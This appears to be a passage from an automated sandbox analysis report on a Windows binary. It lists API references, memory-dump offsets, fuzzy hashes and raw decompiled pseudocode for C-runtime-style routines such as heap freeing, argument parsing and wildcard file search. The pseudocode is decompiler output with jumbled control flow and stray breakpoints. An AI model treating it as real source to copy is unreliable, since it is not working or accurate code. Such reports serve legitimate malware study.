0x00410ce6
0x00410cf1

APIs

_free.LIBCMT ref: 00410CA1

Part of subcall function 0040F096: HeapFree.KERNEL32(00000000,00000000,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?), ref: 0040F0AC
Part of subcall function 0040F096: GetLastError.KERNEL32(?,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?,?), ref: 0040F0BE

_free.LIBCMT ref: 00410CB3
_free.LIBCMT ref: 00410CC5
_free.LIBCMT ref: 00410CD7
_free.LIBCMT ref: 00410CE9

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6d10d02a7a120ef09bda35a000913b63c6ac4bb830e73d6109073479f3479ba2
Instruction ID: da3056dd066ef386fc3b4fc63cf1b11fb59f4db17e9470ec28e7e74f5ea59b16
Opcode Fuzzy Hash: 6d10d02a7a120ef09bda35a000913b63c6ac4bb830e73d6109073479f3479ba2
Instruction Fuzzy Hash: 39F0F432608600ABC634EB65EB81C5A73E9AA00711795093AF144E7F51EBB9FCC19A9C

Uniqueness

Uniqueness Score: -1.00%

Function 03F60ED9, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F60EF1

Part of subcall function 03F5F2E6: HeapFree.KERNEL32(00000000,00000000,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?), ref: 03F5F2FC
Part of subcall function 03F5F2E6: GetLastError.KERNEL32(?,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?,?), ref: 03F5F30E

_free.LIBCMT ref: 03F60F03
_free.LIBCMT ref: 03F60F15
_free.LIBCMT ref: 03F60F27
_free.LIBCMT ref: 03F60F39

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6d10d02a7a120ef09bda35a000913b63c6ac4bb830e73d6109073479f3479ba2
Instruction ID: cec94476b2b27aa846ada6016550abc6e1325f47703025a5935e3cf6b1fef01f
Opcode Fuzzy Hash: 6d10d02a7a120ef09bda35a000913b63c6ac4bb830e73d6109073479f3479ba2
Instruction Fuzzy Hash: F2F0627691C342FB8634EB54EA80C2AB7EDEA003107B94849F645DB650CF70F8819A68

Uniqueness

Uniqueness Score: -1.00%

Function 004389F0, Relevance: 7.5, APIs: 5, Instructions: 36memorytimeCOMMON

Download Yara Rule

APIs

SetSystemTimeAdjustment.KERNEL32(00000000,00000000), ref: 00438A0A
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00438A2E
GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00438A36
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00438A4C
SizeofResource.KERNEL32(00000000,00000000,00438CFF,?,?), ref: 00438A69

Memory Dump Source

Source File: 00000010.00000002.392710030.0000000000427000.00000020.00020000.sdmp, Offset: 00427000, based on PE: false

Similarity

API ID: AdjustmentAllocateAttributesCodeExitFileHeapProcessResourceSizeofSystemTime
String ID:
API String ID: 227841469-0
Opcode ID: 70704fac5273d07edde2198acb70a34b3c740bde9ab8da72fb596501c66690da
Instruction ID: 87bec27b06c01a5813f0021bd649e1fa2118877a3f34bca519d49d3e3bf2adf3
Opcode Fuzzy Hash: 70704fac5273d07edde2198acb70a34b3c740bde9ab8da72fb596501c66690da
Instruction Fuzzy Hash: 73F06232384700EBEB20FB56ED8AB197375A748B02F20441BF305E73D9CAB85851DA2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F45D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040F45D(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E0040DC37(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00412A87(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E0040D517();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E0040F24A(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E00412A87(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E0040FA47(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E0040F096(_t302);
														_t305 = _v12;
													}
													E0040F096(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E00412A87(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0040D517();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x4228e8; // 0xfc126c15
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E00412AE0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E0040F440(_t245 - _t289 + 1, _t289,  &_v676, E0040F954(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E0040F371( &(_v608.cFileName),  &_v640,  &_v609, E0040F954(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E0040F096(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E0040F096(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E00412590(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E0040F2A7);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E0040F096(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E0040A627(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E0040F096(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E00412AA0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E0040F096( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E0040F096(_t285);
						goto L31;
					}
				} else {
					_t220 = E0040F237(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E0040D4EA();
					L31:
					return _t299;
				}
				L81:
			}

0x0040f462
0x0040f465
0x0040f469
0x0040f46b
0x0040f481
0x0040f485
0x0040f488
0x0040f48a
0x0040f48c
0x0040f48e
0x0040f490
0x0040f493
0x0040f496
0x0040f499
0x0040f49b
0x0040f4fe
0x0040f500
0x0040f503
0x0040f505
0x0040f509
0x0040f512
0x0040f513
0x0040f516
0x0040f518
0x0040f51b
0x0040f51f
0x0040f51f
0x0040f521
0x0040f523
0x0040f525
0x0040f527
0x0040f527
0x0040f529
0x0040f52c
0x0040f52f
0x0040f52f
0x0040f531
0x0040f532
0x0040f532
0x0040f53d
0x0040f53f
0x0040f542
0x0040f543
0x0040f546
0x0040f546
0x0040f54a
0x0040f54d
0x0040f550
0x0040f550
0x0040f550
0x0040f55d
0x0040f55f
0x0040f562
0x0040f564
0x0040f57c
0x0040f57f
0x0040f582
0x0040f584
0x0040f587
0x0040f589
0x0040f58c
0x0040f58f
0x0040f5ec
0x0040f5ef
0x0040f5f2
0x0040f5f4
0x00000000
0x0040f591
0x0040f593
0x0040f593
0x0040f595
0x0040f598
0x0040f598
0x0040f59a
0x0040f59c
0x0040f5a2
0x0040f5a5
0x0040f5a5
0x0040f5a7
0x0040f5a8
0x0040f5a8
0x0040f5af
0x0040f5b2
0x0040f5b6
0x0040f5c3
0x0040f5c8
0x0040f5cb
0x0040f5cd
0x0040f641
0x0040f642
0x0040f643
0x0040f644
0x0040f645
0x0040f646
0x0040f64b
0x0040f64f
0x0040f651
0x0040f652
0x0040f655
0x0040f655
0x0040f658
0x0040f658
0x0040f65a
0x0040f65b
0x0040f65b
0x0040f65f
0x0040f660
0x0040f667
0x0040f66a
0x0040f66d
0x0040f66f
0x0040f677
0x0040f678
0x0040f679
0x0040f67c
0x0040f686
0x0040f68a
0x0040f68c
0x0040f6a0
0x0040f6a0
0x0040f6a3
0x0040f6ad
0x0040f6b2
0x0040f6b5
0x0040f6b7
0x00000000
0x0040f6b9
0x0040f6b9
0x0040f6be
0x0040f6c5
0x0040f6c8
0x0040f6ca
0x0040f6db
0x0040f6dd
0x0040f6df
0x0040f6df
0x0040f6df
0x0040f6cc
0x0040f6cd
0x0040f6d2
0x0040f6d5
0x0040f6e4
0x0040f6ea
0x00000000
0x0040f6ed
0x0040f68e
0x0040f68e
0x0040f694
0x0040f699
0x0040f69c
0x0040f69e
0x0040f6f0
0x0040f6f2
0x0040f6f3
0x0040f6f4
0x0040f6f5
0x0040f6f6
0x0040f6f7
0x0040f6fc
0x0040f6ff
0x0040f700
0x0040f702
0x0040f708
0x0040f70f
0x0040f712
0x0040f715
0x0040f718
0x0040f719
0x0040f71a
0x0040f71d
0x0040f723
0x0040f725
0x0040f727
0x0040f727
0x0040f729
0x0040f72b
0x00000000
0x00000000
0x0040f72d
0x0040f72f
0x0040f731
0x0040f733
0x0040f73e
0x0040f740
0x0040f742
0x00000000
0x00000000
0x0040f742
0x0040f733
0x00000000
0x0040f72f
0x0040f744
0x0040f744
0x0040f74a
0x0040f74c
0x0040f752
0x0040f754
0x0040f776
0x0040f776
0x0040f778
0x0040f77a
0x0040f786
0x0040f786
0x0040f77c
0x0040f77c
0x0040f77e
0x00000000
0x0040f780
0x0040f780
0x0040f782
0x0040f784
0x00000000
0x00000000
0x0040f784
0x0040f77e
0x0040f78e
0x0040f796
0x0040f79c
0x0040f79d
0x0040f79f
0x0040f7a7
0x0040f7ad
0x0040f7b3
0x0040f7b9
0x0040f7cd
0x0040f7d2
0x0040f7dd
0x0040f7ed
0x0040f7f3
0x0040f7f5
0x0040f7f8
0x0040f81b
0x0040f81b
0x0040f820
0x0040f826
0x0040f826
0x0040f82c
0x0040f832
0x0040f838
0x0040f83e
0x0040f844
0x0040f865
0x0040f86a
0x0040f86f
0x0040f873
0x0040f879
0x0040f87c
0x0040f88f
0x0040f88f
0x0040f895
0x0040f89b
0x0040f89c
0x0040f89d
0x0040f8a2
0x0040f8a5
0x0040f8ab
0x0040f8ad
0x0040f90b
0x0040f911
0x0040f919
0x0040f91e
0x0040f924
0x0040f925
0x00000000
0x00000000
0x00000000
0x0040f87e
0x0040f87e
0x0040f881
0x0040f883
0x00000000
0x0040f885
0x0040f885
0x0040f888
0x00000000
0x0040f88a
0x0040f88a
0x0040f88d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f88d
0x0040f888
0x0040f883
0x0040f927
0x0040f928
0x00000000
0x0040f8af
0x0040f8af
0x0040f8b5
0x0040f8bd
0x0040f8c2
0x0040f8d1
0x0040f8d1
0x0040f8d9
0x0040f8df
0x0040f8e5
0x0040f8ec
0x0040f8ef
0x0040f8f1
0x0040f901
0x0040f906
0x00000000
0x0040f7fa
0x0040f7fa
0x0040f800
0x0040f801
0x0040f802
0x0040f803
0x0040f80b
0x0040f80b
0x0040f92e
0x0040f92e
0x0040f936
0x0040f93e
0x0040f943
0x0040f756
0x0040f759
0x0040f75b
0x0040f770
0x00000000
0x0040f75d
0x0040f75d
0x0040f760
0x0040f761
0x0040f762
0x0040f763
0x0040f768
0x0040f75b
0x0040f94a
0x0040f953
0x00000000
0x00000000
0x00000000
0x0040f69e
0x0040f671
0x0040f673
0x0040f674
0x0040f676
0x0040f676
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f5cf
0x0040f5cf
0x0040f5d5
0x0040f5d8
0x0040f5db
0x0040f5de
0x0040f5e1
0x0040f5e4
0x0040f5e7
0x0040f5e7
0x00000000
0x0040f598
0x0040f566
0x0040f566
0x0040f569
0x0040f5f6
0x0040f5f7
0x0040f5fc
0x00000000
0x0040f5fc
0x0040f49d
0x0040f49d
0x0040f4a0
0x0040f4a8
0x0040f4ab
0x0040f4b2
0x0040f4b4
0x0040f4b6
0x0040f4d1
0x0040f4d2
0x0040f4d3
0x0040f4d4
0x0040f4d9
0x0040f4dc
0x0040f4df
0x0040f4b8
0x0040f4b8
0x0040f4bb
0x0040f4bc
0x0040f4bd
0x0040f4be
0x0040f4bf
0x0040f4c4
0x0040f4c6
0x0040f4c9
0x0040f4c9
0x0040f4e1
0x0040f4e3
0x00000000
0x00000000
0x0040f4ec
0x0040f4ef
0x0040f4f2
0x0040f4f4
0x0040f4f6
0x00000000
0x0040f4f8
0x0040f4f8
0x0040f4fb
0x00000000
0x0040f4fb
0x00000000
0x0040f4f6
0x0040f571
0x0040f5fd
0x0040f600
0x0040f604
0x0040f60d
0x0040f610
0x0040f614
0x0040f614
0x0040f616
0x0040f619
0x0040f61b
0x0040f61d
0x0040f61f
0x0040f624
0x0040f625
0x0040f629
0x0040f629
0x0040f62d
0x0040f630
0x0040f630
0x0040f634
0x00000000
0x0040f63b
0x0040f46d
0x0040f46d
0x0040f474
0x0040f475
0x0040f477
0x0040f63c
0x0040f640
0x0040f640
0x00000000

APIs

_free.LIBCMT ref: 0040F5F7

Strings

*?, xrefs: 0040F4A0

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 654fb2f2526ce3d2a9136e83b9863b0b9ea94b49ab762218bd85c62b94369f40
Instruction ID: a97ec9e081fc131c671552e4b550bd0b45ea9afa1c106beadd5e69621cdb0187
Opcode Fuzzy Hash: 654fb2f2526ce3d2a9136e83b9863b0b9ea94b49ab762218bd85c62b94369f40
Instruction Fuzzy Hash: 60615075E00219AFCB24CFA9C8815EEFBF5EF48314B24817AE805F7741D639AE458B94

Uniqueness

Uniqueness Score: -1.00%

Function 03F5F6AD, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F5F847

Strings

*?, xrefs: 03F5F6F0

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 654fb2f2526ce3d2a9136e83b9863b0b9ea94b49ab762218bd85c62b94369f40
Instruction ID: 95bf227c81d157fc581bed945ea3f71e81dd3f9aa5c7753edc1fd2ddd6a032cf
Opcode Fuzzy Hash: 654fb2f2526ce3d2a9136e83b9863b0b9ea94b49ab762218bd85c62b94369f40
Instruction Fuzzy Hash: 1D613F76D0021ADFDB14DFA8C9805EDFBF9EF48310B2981AAED15E7304D6759E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0040D98A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040D98A(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E0041019A(_t48, _t59);
						E0040FBDB(_t57, 0, 0x423630, 0x104);
						_t26 =  *0x4238f8; // 0x3e13538
						 *0x4238e8 = 0x423630;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x423630;
							_v20 = 0x423630;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E0040DC37(E0040DAC0( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E0040DAC0( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0040FACE(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x4238ec = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x4238f0 = _t58;
											L18:
											E0040F096(_t37);
											_v12 = 0;
											L19:
											E0040F096(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x4238ec = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x4238f0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E0040F237(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E0040F237(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E0040D4EA();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x0040d98a
0x0040d993
0x0040d998
0x0040d9a2
0x0040d9a5
0x0040d9c2
0x0040d9c2
0x0040d9c3
0x0040d9d6
0x0040d9db
0x0040d9e3
0x0040d9e9
0x0040d9ec
0x0040d9ee
0x0040d9f5
0x0040d9f5
0x0040d9f7
0x0040d9fa
0x0040d9fd
0x0040da04
0x0040da1d
0x0040da22
0x0040da24
0x0040da45
0x0040da4d
0x0040da50
0x0040da6b
0x0040da6e
0x0040da75
0x0040da79
0x0040da7b
0x0040da82
0x0040da85
0x0040da87
0x0040da89
0x0040da8b
0x0040da95
0x0040da95
0x0040da97
0x0040da9d
0x0040daa0
0x0040daa2
0x0040daa8
0x0040daa9
0x0040daaf
0x0040dab2
0x0040dab3
0x0040dab9
0x0040dabc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040da8d
0x0040da8d
0x0040da8d
0x0040da90
0x0040da91
0x0040da91
0x00000000
0x0040da8d
0x0040da7d
0x00000000
0x0040da7d
0x0040da55
0x0040da55
0x0040da56
0x0040da5b
0x0040da5d
0x0040da5f
0x0040da64
0x0040da64
0x00000000
0x0040da64
0x0040da26
0x0040da2b
0x0040da2d
0x0040da2e
0x00000000
0x0040da2e
0x0040d9f0
0x0040d9f3
0x00000000
0x00000000
0x00000000
0x0040d9f3
0x0040d9a7
0x0040d9aa
0x00000000
0x00000000
0x0040d9ac
0x0040d9b3
0x0040d9b4
0x0040d9b6
0x0040d9bb
0x00000000
0x0040d9bb
0x00000000

Strings

06B, xrefs: 0040D9E3
